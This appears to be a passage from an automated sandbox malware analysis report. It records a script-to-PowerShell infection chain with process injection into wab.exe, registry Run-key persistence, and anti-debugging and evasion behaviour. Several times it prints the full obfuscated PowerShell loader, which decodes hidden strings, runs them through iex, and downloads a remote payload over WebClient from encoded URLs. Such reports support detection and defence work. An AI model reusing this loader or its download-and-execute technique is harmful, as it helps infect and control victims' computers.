o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 19_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF886FB3025 pushad ; ret 2_2_00007FF886FB313A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0481EC78 pushfd ; retf 5_2_0481EC79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07681FB2 push eax; mov dword ptr [esp], ecx 5_2_076821B4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F648A4 push ebx; ret 5_2_08F648A5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F62845 push cs; iretd 5_2_08F6284F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F64D9F push ss; ret 5_2_08F64DAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F63571 push esp; ret 5_2_08F6358B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F63118 push eax; iretd 5_2_08F6311A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F652D2 push cs; ret 5_2_08F65301
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F62AAA push 00000009h; iretd 5_2_08F62AB7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F62291 push edx; retf 5_2_08F6229A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F63E85 push ebp; ret 5_2_08F63EC9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08F60364 pushfd ; retf 5_2_08F60374
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_22B31219 push esp; iretd 10_2_22B3121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_22B22806 push ecx; ret 10_2_22B22819
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A80364 pushfd ; retf 10_2_03A80374
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A82AAA push 00000009h; iretd 10_2_03A82AB7
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A83E85 push ebp; ret 10_2_03A83EC9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A82291 push edx; retf 10_2_03A8229A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A852D2 push cs; ret 10_2_03A85301
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A84D9F push ss; ret 10_2_03A84DAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A83118 push eax; iretd 10_2_03A8311A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A83571 push esp; ret 10_2_03A8358B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A848A4 push ebx; ret 10_2_03A848A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A82845 push cs; iretd 10_2_03A8284F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0044693D push ecx; ret 19_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0044DB70 push eax; ret 19_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0044DB70 push eax; ret 19_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00451D54 push eax; ret 19_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_0044B090 push eax; ret 21_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_0044B090 push eax; ret 21_2_0044B0CC
              Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_004047CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 45859B3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4878
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5855
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1920
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 5855 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 3864 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7468Thread sleep count: 1920 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1920 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22B210F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22B26580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,19_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00418981 memset,GetSystemInfo,19_2_00418981
              Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH%V%SystemRoot%\system32\mswsock.dll
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
              Source: wscript.exe, 00000000.00000003.1329861249.000001C22DBA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me ServerGoogle Chrome Elevation Service (GoogleChromeElevationService)Group Policy ClientGraphicsPerfSvcGoogle Update Service (gupdate)Google Update Service (gupdatem)Human Interface Device ServiceHV Host ServiceWindows Mobile Hotspot ServiceIKE and AuthIP IPsec Keying ModulesMicrosoft Store Install ServiceIP HelperIP Translation Configuration ServiceCNG Key IsolationKtmRm for Distributed Transaction CoordinatorServerWorkstationGeolocation ServiceWindows License Manager ServiceLink-Layer Topology Discovery MapperTCP/IP NetBIOS HelperLSMLanguage Experience ServiceDownloaded Maps ManagerMcpManagementServiceMicrosoft Edge Elevation Service (MicrosoftEdgeElevationService)Windows Mixed Reality OpenXR ServiceMozilla Maintenance ServiceWindows Defender FirewallDistributed Transaction CoordinatorMicrosoft iSCSI Initiator ServiceWindows InstallerMicrosoft Keyboard FilterNatural AuthenticationNetwork Connectivity AssistantNetwork Connection BrokerNetwork Connected Devices Auto-SetupNetlogonNetwork ConnectionsNetwork List ServiceNetSetupSvcNet.Tcp Port Sharing ServiceMicrosoft Passport ContainerMicrosoft PassportNetwork Location AwarenessNetwork Store Interface ServicePeer Networking Identity ManagerPeer Networking GroupingProgram Compatibility Assistant ServiceBranchCacheWindows Perception Simulation ServicePerformance Counter DLL HostPhone ServicePerformance Logs & AlertsPlug and PlayPNRP Machine Name Publication ServicePeer Name Resolution ProtocolIPsec Policy AgentPowerPrinter Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security 
Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhvB999.tmp.19.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: powershell.exe, 00000002.00000002.2065998160.00000137B1270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_21-34117
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

              Anti Debugging

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04819AD9 LdrInitializeThunk,5_2_04819AD9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22B22639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,19_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B24AB4 mov eax, dword ptr fs:[00000030h]10_2_22B24AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B2724E GetProcessHeap,10_2_22B2724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_22B22B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22B260E2

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A80000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: FFDCC
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet 